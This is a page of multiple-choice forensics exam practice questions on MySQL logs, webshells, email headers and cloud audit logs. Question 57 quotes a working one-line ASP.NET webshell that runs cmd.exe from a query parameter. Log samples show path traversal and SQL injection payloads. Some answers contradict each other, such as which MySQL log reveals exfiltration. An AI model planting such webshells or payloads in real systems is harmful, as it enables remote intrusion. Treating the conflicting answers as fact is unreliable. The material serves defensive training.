The general query log is the correct choice because it captures every SQL statement received from clients, including SELECT queries, regardless of whether they modify data or exceed performance thresholds. In a MySQL compromise, attackers often use SELECT statements to exfiltrate sensitive data, and this log provides a complete chronological record of those reads. Unlike the binary or slow query logs, it does not filter by data-change events or execution time, making it the only reliable artifact for detecting and reconstructing data theft via query activity.

Why this answer

The general query log records every SQL statement received by the MySQL server, including SELECT queries used for data exfiltration. Since the investigator needs the exact time and content of the suspect query, this log provides a complete, chronological record of all client-sent statements, making it the primary source for identifying the exfiltration event.

Exam trap

A common misconception is that the binary log captures all queries, but it only captures data-changing statements (DML/DDL), not SELECTs, which are the primary vector for data exfiltration.

How to eliminate wrong answers

Option B (Error log) is wrong because it only records server startup/shutdown events, crashes, and critical errors, not the content of executed queries. Option C (Binary log) is wrong because it records changes to data (INSERT, UPDATE, DELETE) for replication and point-in-time recovery, but does not log SELECT queries, which are the typical exfiltration statements. Option D (Slow query log) is wrong because it only captures queries that exceed a defined execution time threshold (e.g., long-running SELECTs), and the exfiltration query may not be slow, so it could be missed entirely.

56
Multi-Selectmedium

Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?

Select 2 answers
A.Verifying SSL certificate validity
B.Searching for files with recent creation or modification timestamps in the web root
C.Running a full antivirus scan on the server
D.Analyzing web server logs for anomalous POST requests to script files that return 200 OK with large response sizes
E.Checking for open ports on the server
AnswersB, D

Searching for files with recent creation or modification timestamps in the web root is a practical initial triage because webshells are usually uploaded shortly before they are used, and the upload leaves a fresh file on disk. In particular, script files such as .php, .jsp, or .aspx that appear in web-accessible directories with timestamps matching the time of a suspected breach are strong candidates for further manual review. While attackers can alter timestamps to hide their tracks, this technique is still appropriate and often the first step in a forensic hunt for malicious web content.

Why this answer

Webshells are often detected by recent file timestamps and anomalous POST requests in logs.

57
MCQhard

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

A.It is a database connection string
B.It is a legitimate ASP.NET application page for server management
C.It is a webshell used for remote command execution
D.It is a cross-site scripting payload
AnswerC

This is a classic ASP.NET webshell: it reads a command from the HTTP query string (often "cmd"), starts cmd.exe through Process.Start, and returns the command output in the HTTP response. This gives a remote attacker an unauthenticated command shell on the web server, making it a direct indicator of compromise. During a forensic investigation, such code should be preserved as malicious evidence and traced back to the upload or exploitation vector.

Why this answer

This is a webshell that executes arbitrary operating system commands via the 'cmd' query parameter. It allows remote command execution on the server.

58
MCQhard

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

A.Man-in-the-middle
B.Email spoofing
C.Malware attachment
D.Phishing
AnswerB

Email spoofing is the forgery of email header fields, typically the From/Reply-To address, to make a message appear to originate from a trusted source while it actually came from an unrelated or attacker-controlled server. Here, the originating Received server and HELO/EHLO identity do not align with the claimed From domain, which is exactly the signature of a spoofed message. SMTP lacks built-in sender authentication, so unlike a MITM that alters traffic in transit, this anomaly is the result of direct manipulation of the message headers during composition.

Why this answer

The email claims to be from 'ceo@victim.com' but was received from 'mail.attacker.com', indicating the sender forged the From address. This is email spoofing.

59
MCQeasy

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

A.Return-Path
B.Received
C.Message-ID
D.From
AnswerB

Each mail server that processes the email prepends its own Received header, creating a chronological chain from the origin to the destination. The bottommost Received header, added first, typically reveals the originating IP address of the sender's mail server or client, which is why it is the primary evidence for tracing. While the last Received header is added by the receiving server, the chain can be partially forged if the sending server is malicious, so analysts corroborate the first Received header with server logs.

Why this answer

The 'Received' header is the most reliable for determining the true originating IP address because each mail server that handles the email adds a new 'Received' field at the top of the header. The bottommost 'Received' header (the first one added) typically contains the IP address of the sender's MTA or the client's IP, assuming no spoofing. This field is sequentially added by each hop and is the primary source for tracing the email's path back to its origin.

Exam trap

EC-Council often tests that candidates confuse the 'From' or 'Return-Path' headers with the actual origin IP, but the trap is that these fields are easily spoofed and contain no IP information, whereas the 'Received' headers provide the true network path.

How to eliminate wrong answers

Option A is wrong because the 'Return-Path' header (also called 'envelope from') is used for bounce handling and contains the address specified in the SMTP MAIL FROM command, not the sender's IP address. Option C is wrong because the 'Message-ID' header is a unique identifier generated by the sending MUA or MTA for tracking and deduplication, and it contains no IP address information. Option D is wrong because the 'From' header is a user-visible field that can be arbitrarily set by the sender's email client and is easily forged; it does not provide any network-layer origin information.

60
MCQmedium

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

A.GetObject
B.PutObject
C.DeleteObject
D.ListObjects
AnswerD

ListObjects is the S3 API call that returns a list of object keys, sizes, and metadata for a bucket, optionally filtered by a prefix or delimiter, and in CloudTrail it is recorded as eventName 'ListObjects' (or 'ListObjectsV2' for the paginated version). This operation enables an actor to enumerate bucket contents without knowing specific keys in advance, which is exactly what a forensic investigator would look for to establish reconnaissance or unauthorized enumeration. As the correct answer, ListObjects indicates that someone accessed the bucket's inventory, unlike Get, Put, and Delete operations that target a single known object.

Why this answer

The ListObjects operation lists the objects in an S3 bucket; the CloudTrail event name is 'ListObjects'.

61
MCQmedium

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

A.Remote code execution (RCE)
B.Directory traversal
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB

The presence of ../ (dot-dot-slash) sequences is a classic indicator of directory traversal, where an attacker manipulates file paths to escape the web root and access arbitrary files. In this IIS log entry, the request appears to target a system executable such as cmd.exe outside the website's home directory. Even though the response is 404, the attack pattern—traversing upward with ../ and requesting a sensitive Windows binary—clearly identifies a path traversal attempt rather than another vulnerability class.

Why this answer

The presence of '../' sequences in the URI path indicates a path traversal attack attempting to access files outside the web root.

62
MCQmedium

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

A.Remote File Inclusion
B.Path Traversal
C.Command Injection
D.Cross-Site Request Forgery (CSRF)
AnswerB

The request in the Apache log uses multiple '../' sequences to traverse upward from the web root directory, aiming to access sensitive files such as ../../../../etc/passwd. This is a textbook directory traversal (path traversal) attack, categorized as CWE-22, where the application fails to validate or sanitize file path inputs. The repeated '..' segments allow the attacker to escape the intended document root and read files elsewhere on the filesystem, like password hashes or configuration secrets. Because the log shows a direct path traversal payload rather than code execution or URL inclusion, Path Traversal is the correct answer.

Why this answer

The URI contains '../../../../etc/passwd', which is a path traversal attempt to read the /etc/passwd file. The 404 status indicates the file was not found, but the intent is clear.

63
MCQmedium

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

A.Cloud Storage logs
B.Cloud Monitoring
C.Cloud IAM
D.Cloud Audit Logs
AnswerD

Cloud Audit Logs are the correct source because they provide a comprehensive, immutable log of administrative and authentication activities across Google Cloud, including the identity of the caller, the action performed, the resource affected, and the timestamp. Admin Activity logs are enabled by default, and when data access is enabled, they capture read/write operations as well, making them the definitive auditable trail for forensic reconstruction of who did what, where, and when.

Why this answer

Cloud Audit Logs is the correct answer because it is the dedicated GCP service that captures and stores audit trails for administrative activities (Admin Activity audit logs) and data access (Data Access audit logs) within Google Cloud Platform. These logs record who did what, where, and when, which is essential for forensic investigations in cloud environments.

Exam trap

EC-CHFI candidates often confuse Cloud Audit Logs with Cloud Monitoring, mistakenly associating 'monitoring' with logging, but Cloud Monitoring is for metrics and alerts, not audit trails.

How to eliminate wrong answers

Option A is wrong because Cloud Storage logs refer to access logs and storage logs specific to Cloud Storage buckets, not the comprehensive audit logs for all GCP services. Option B is wrong because Cloud Monitoring (formerly Stackdriver Monitoring) is a metrics and alerting service, not a logging service for audit trails. Option C is wrong because Cloud IAM is an identity and access management service that controls permissions but does not generate or store audit logs.

64
MCQmedium

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

A.Trojan horse
B.Cross-site scripting (XSS) exploit
C.SQL injection payload
D.Web shell
AnswerD

A web shell is a malicious script placed on a web server that accepts commands via HTTP parameters—often using names like 'cmd'—to execute system processes, upload/download files, or create reverse shells. It provides persistent remote command execution and is the precise classification for a file that appears to be a command execution handler on an infected web server. This matches the forensic finding exactly.

Why this answer

A file that accepts commands via HTTP and executes them on the server is a web shell. ASPX is a common extension for .NET web shells.

65
MCQmedium

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

A.Remote file inclusion
B.Path traversal
C.SQL injection
D.Cross-site scripting (XSS)
AnswerC

This payload is a textbook SQL injection tautology: placing 1' OR '1'='1 inside a WHERE clause, such as WHERE user='admin' AND pass='1' OR '1'='1', makes the entire predicate evaluate to true, allowing authentication bypass or full table extraction. In an Apache access log, the malicious string can appear as part of the request URI or, less commonly, in the request body when access logging includes POST data. The single quote breaks out of the SQL string literal, and the OR condition forces a true result for every row, which is the definitive indicator of SQL injection testing or exploitation. Any defense should focus on parameterized queries, not input filtering alone, because the payload is syntactically valid SQL.

Why this answer

The pattern 1' OR '1'='1 is a classic SQL injection payload attempting to bypass authentication or extract data. The single quote and OR condition are characteristic of SQLi.

66
Multi-Selecthard

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

Select 2 answers
A.Using docker logs command to retrieve container logs
B.Using docker inspect to get log configuration
C.Copying log files from the container using docker cp
D.Using docker exec to run syslog inside the container
E.Using docker image to view the image layers
AnswersA, C

The `docker logs` command is the canonical method for retrieving the console output of a container, as it reads the stdout and stderr streams that were captured by the container runtime. By default, these streams are stored in a JSON-file log on the host under `/var/lib/docker/containers/<container-id>/<container-id>-json.log`, and `docker logs` presents them in a human-readable format. It also supports flags like `--since`, `--tail`, and `--follow` to filter or stream the logs, making it a direct and efficient way to collect a container's standard output without needing to access its filesystem.

Why this answer

Option A is correct because the `docker logs` command retrieves the stdout/stderr output captured by the container's configured logging driver (e.g., json-file, journald), which is the primary source of application logs for forensic review. Option C is correct because `docker cp` allows an investigator to copy log files written inside the container's filesystem (e.g., /var/log/app.log) to the host for offline analysis, which is essential when logs are not sent to stdout/stderr. Option B is not a collection method; `docker inspect` only reveals the logging driver and configuration (such as LogPath), not the log contents themselves.

Option D is not a valid collection method because running syslog inside the container starts a new logging service rather than extracting existing container logs. Option E is incorrect because `docker image` inspects image layers and metadata, which contain no runtime container logs.

Exam trap

EC-Council often tests the distinction between commands that retrieve logs (`docker logs`, `docker cp`) versus commands that inspect configuration or modify the container, leading candidates to mistakenly select `docker inspect` or `docker exec` as log collection methods.

67
MCQhard

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

A.General query log
B.Binary log
C.Slow query log
D.Error log
AnswerA

The general query log is the only MySQL log that records the complete text of every SQL statement as received from clients, including plain SELECT queries used for data exfiltration. When enabled (general_log=ON), each client connection and statement is written to a file or table, giving an investigator a direct timeline of query activity, timestamps, and the exact data being read. It is the definitive source for detecting and reconstructing unauthorized data retrieval.

Why this answer

MySQL general query log logs all queries, but can be resource-intensive. Binary logs record changes. Error logs contain errors.

Slow query log logs slow queries. The general query log is best for seeing all queries from a compromised account.

68
MCQmedium

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

A.The first 'Received' header at the top
B.The last 'Received' header at the bottom
C.The 'X-Originating-IP' header
D.The 'Return-Path' header
AnswerB

The bottommost Received header is chronologically the first hop recorded, inserted by the sender's first SMTP server or mail user agent at the time of submission. It is the deepest part of the routing chain and provides the closest traceable IP/HELO information to the true origin, making it the best evidence for identifying the actual source. Analysts rely on this header because subsequent servers append above it without altering its content in normal operation.

Why this answer

The last 'Received' header at the bottom is the most trustworthy because email headers are added in reverse chronological order: each mail server prepends its own 'Received' field to the top of the header block. Therefore, the bottommost 'Received' header represents the first hop from the sender's MTA (Mail Transfer Agent) or the originating client, making it the closest to the true source IP.

Exam trap

A common trap in CHFI is to assume headers are chronological from top to bottom, leading candidates to select the first 'Received' header as the origin. In reality, the bottommost header is the earliest hop.

How to eliminate wrong answers

Option A is wrong because the first 'Received' header at the top is the most recent addition, added by the recipient's mail server, not the sender's; it reflects the last hop, not the origin. Option C is wrong because 'X-Originating-IP' is a non-standard, optional header that may be set by the sender's webmail interface (e.g., Outlook Web Access) but is often absent, easily spoofed, or not present in SMTP-transmitted emails; it is not a reliable forensic source. Option D is wrong because the 'Return-Path' header (or envelope sender) contains the bounce address (MAIL FROM) and is set by the sender's MTA, but it does not carry the originating IP address; it is used for delivery failure notifications, not for IP traceability.

69
MCQhard

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

A.A legitimate administrative tool for server management
B.A webshell allowing remote command execution
C.A backdoor installed via a SQL injection vulnerability
D.A malware dropper for deploying ransomware
AnswerB

The file is a webshell because it accepts attacker-supplied input through HTTP parameters and passes it directly to a function such as system(), exec(), shell_exec(), or eval(). This provides unauthenticated remote command execution on the web server, allowing an attacker to run arbitrary commands, read sensitive files, or pivot to the internal network. The presence of obfuscated code, a small file size, and a recently modified timestamp in a writable web directory strongly corroborates this conclusion.

Why this answer

The file 'cmd.aspx' is an ASP.NET webshell that accepts commands via the 'cmd' parameter and executes them server-side. This is a classic indicator of a webshell, which provides remote command execution (RCE) capabilities to an attacker, not a legitimate administrative tool.

Exam trap

The CHFI exam often tests the distinction between the artifact itself (webshell) and the method of compromise (e.g., SQL injection), so candidates may incorrectly choose option C because they focus on how the file got there rather than what the file is.

How to eliminate wrong answers

Option A is wrong because legitimate administrative tools for ASP.NET server management (e.g., Remote Desktop, PowerShell Remoting, or IIS Manager) do not use a single file named 'cmd.aspx' in an uploads directory; such tools require authentication and are not typically placed in user-writable folders. Option C is wrong because while SQL injection could be used to upload a webshell, the artifact itself is the webshell, not the injection vector; the question asks what the file 'cmd.aspx' best describes, not how it was installed. Option D is wrong because a malware dropper is a program that installs other malware (e.g., ransomware), but 'cmd.aspx' is a webshell that provides interactive command execution, not a dropper that deploys additional payloads.

70
Multi-Selecthard

A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?

Select 3 answers
A.Analyze the IAM policy change that granted the role to identify the source
B.Revoke the service account's excessive permissions
C.Contact law enforcement immediately
D.Preserve the audit logs by exporting them to a secure location
E.Delete the storage bucket to prevent further access
AnswersA, B, D

Analyzing the IAM policy change that granted the role is the definitive step for identifying the source because it reveals the exact principal, timestamp, and method used to elevate privileges. Check Cloud Admin Activity audit logs for 'google.iam.admin.v1.SetIAMPolicy' events, noting whether the grant came from a compromised user, an OAuth token, or an external session. This forensic root-cause analysis establishes the attack vector and scope, guiding appropriate containment and recovery efforts.

Why this answer

Option A is correct because the first event is an IAM policy change (granting roles/storage.objectAdmin), and the analyst must trace the Admin Activity audit log entry for SetIamPolicy to identify the principal, source IP, user agent, and timestamp that made the grant. Option B is correct because roles/storage.objectAdmin grants full control over objects (create, read, update, delete), which is excessive for a service account that only needs to read sensitive data; revoking or downgrading the binding (e.g., to roles/storage.objectViewer) immediately limits further exfiltration. Option D is correct because audit logs are the primary forensic evidence and can be altered or aged out under the default 30-day Data Access log retention, so exporting them to a secure, immutable location (e.g., a locked Cloud Storage bucket or BigQuery dataset) preserves the chain of custody.

Option C is not appropriate as an immediate technical step since law enforcement should be engaged only after internal incident response confirms a breach and per organizational/legal guidance. Option E is wrong because deleting the bucket destroys evidence and does not stop the already-granted service account from acting elsewhere; containment should be done via IAM revocation and key disabling instead.

Exam trap

EC-CHFI emphasizes the importance of preserving evidence and following forensic procedures; candidates might mistakenly choose to delete the bucket thinking it stops the breach, but that destroys evidence and violates forensic chain of custody.

71
MCQeasy

In an email header, which field typically contains the IP address of the original sending client?

A.Return-Path
B.Message-ID
C.Received
D.DKIM-Signature
AnswerC

The Received header is inserted by every SMTP server that handles the message, and each line records the IP address of the transmitting host, the receiving server, protocol information, and a timestamp. The bottommost Received line is the first one added, showing the connection from the originating client or its final relay. Therefore, forensically it is the go-to field for discovering the sending IP address.

Why this answer

The 'Received' field in an email header is added by each mail transfer agent (MTA) that processes the message, and the first 'Received' header (at the bottom of the header block) typically contains the IP address of the original sending client (the SMTP client that initiated the connection). This field records the 'from' IP and the 'by' host, making it the definitive source for tracing the origin of the email.

Exam trap

EC-Council often tests the misconception that the 'Return-Path' field contains the sender's IP address, when in fact it only holds the email address for bounce handling, not any network-layer information.

How to eliminate wrong answers

Option A is wrong because the 'Return-Path' field contains the envelope sender (the bounce address), not the IP address of the sending client; it is used for non-delivery reports, not for tracing the original source IP. Option B is wrong because the 'Message-ID' field is a unique identifier string generated by the sending MUA or MTA, but it does not contain any IP address information; it is used for message tracking and threading. Option D is wrong because the 'DKIM-Signature' field contains a cryptographic signature and associated domain information (e.g., d=domain), but it does not include the sending client's IP address; it is used for email authentication, not origin IP tracing.

72
Multi-Selecteasy

Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)

Select 2 answers
A.Abnormal HTTP methods like OPTIONS or TRACE
B.High volume of traffic from a single IP
C.Requests to a .asp or .php file with parameters like cmd or exec
D.Frequent 404 errors for non-existent pages
E.POST requests to a script file in an upload directory
AnswersC, E

Webshells are often coded in dynamic script languages and expose command execution through parameters such as cmd, exec, or command. A request to a .asp or .php file that includes these parameter names strongly suggests an attacker is attempting to pass shell commands to the server. Such parameter names are unnatural for legitimate application workflows, making this a highly specific webshell indicator.

Why this answer

Option C is correct because webshells are typically small scripts (e.g., .asp, .php, .jsp) that accept command parameters such as cmd, exec, or shell, so log entries showing requests to such files with those parameter names are a strong indicator of command execution through a webshell. Option E is correct because attackers commonly upload a webshell into a writable upload directory and then interact with it via POST requests, so repeated POSTs to a script in an upload folder in the web logs is a classic webshell traffic pattern. Option A is not specific to webshells, since OPTIONS and TRACE are legitimate HTTP methods and their presence alone does not indicate a webshell.

Option B is too generic, as high traffic from one IP can result from many benign causes such as crawlers, load balancers, or DoS activity. Option D is also non-specific, because frequent 404 errors usually indicate broken links, scanning, or enumeration rather than webshell command execution.

Exam trap

EC-Council often tests the distinction between generic web anomalies (like high traffic or 404 errors) and webshell-specific indicators (like command parameters in script requests), so candidates mistakenly select broad traffic patterns instead of the precise log entries that reveal command execution.

73
MCQmedium

In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?

A.Binary log
B.Slow query log
C.General query log
D.Error log
AnswerA

The binary log records all data-modifying statements and row-level changes in chronological order, making it the primary source for reconstructing unauthorised record alterations or exfiltration activity. Unlike the error log or general query log, it captures committed transactions with before-and-after values, directly satisfying the requirement to detect changes to database records.

Why this answer

The binary log is the correct choice because it records all changes to database data and structure (e.g., INSERT, UPDATE, DELETE, CREATE, ALTER) in a binary format that can be replayed for point-in-time recovery. In MySQL forensics, this log is the primary source for detecting unauthorized data exfiltration or modifications, as it captures the exact SQL statements or row changes that altered the database, along with timestamps and server IDs. Unlike other logs, the binary log is specifically designed to track every write operation, making it indispensable for reconstructing malicious activity.

Exam trap

A common misconception is that the general query log (Option C) is the best for detecting data changes because it logs all queries, but the trap is that it logs both reads and writes without the granular, replayable change tracking of the binary log, and it is frequently turned off in production, making the binary log the actual forensic goldmine.

How to eliminate wrong answers

Option B is wrong because the slow query log only records queries that exceed a defined execution time threshold (e.g., long_query_time), focusing on performance issues rather than capturing all data-changing operations; it would miss fast, unauthorized modifications. Option C is wrong because the general query log records all client connections and queries (both reads and writes) in plain text, but it is often disabled in production due to performance overhead and does not provide the structured, binary-level detail needed for precise forensic reconstruction of data changes. Option D is wrong because the error log only records server startup/shutdown events, crashes, and critical errors (e.g., InnoDB corruption), not the actual data manipulation statements required to detect exfiltration or record changes.

74
MCQmedium

A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?

A.Wireshark
B.EmailTracker
C.Sleuth Kit
D.Aid4Mail
AnswerD

Aid4Mail is a forensic-grade email extraction tool specifically designed to parse Microsoft Outlook PST files by interpreting their internal B-tree structure, MAPI property tags, and folder hierarchy. It preserves crucial artifacts such as message timestamps, folder structures, and attachment metadata, and can export to EML, MSG, MBOX, or PDF while maintaining hash-based data integrity for evidence handling. It also supports password-protected PSTs and recovers partially damaged or deleted items, which are common challenges in real investigations. For a forensic analyst examining a PST, Aid4Mail is the appropriate comprehensive solution.

Why this answer

Aid4Mail is a forensic email analysis tool that supports PST, OST, MBOX, and other formats. It is commonly used for email investigations.

75
MCQmedium

Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?

A.EmailTracker
B.Wireshark
C.MailXaminer
D.Outlook
AnswerA

EmailTracker is purpose-built for email forensic metadata extraction: it parses RFC 5322 headers to capture originating IP addresses, Received-chain hops, Message-ID, SPF/DKIM/DMARC authentication results, and timestamps. It then visualizes the routing path to help investigators identify the actual sender and trace email provenance, a capability no generic network or mailbox tool provides.

Why this answer

EmailTracker is a tool that analyzes email headers to trace the path and identify the source IP, often used in email forensics.

Page 1 of 2 · 113 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Application, Email and Cloud Forensics questions.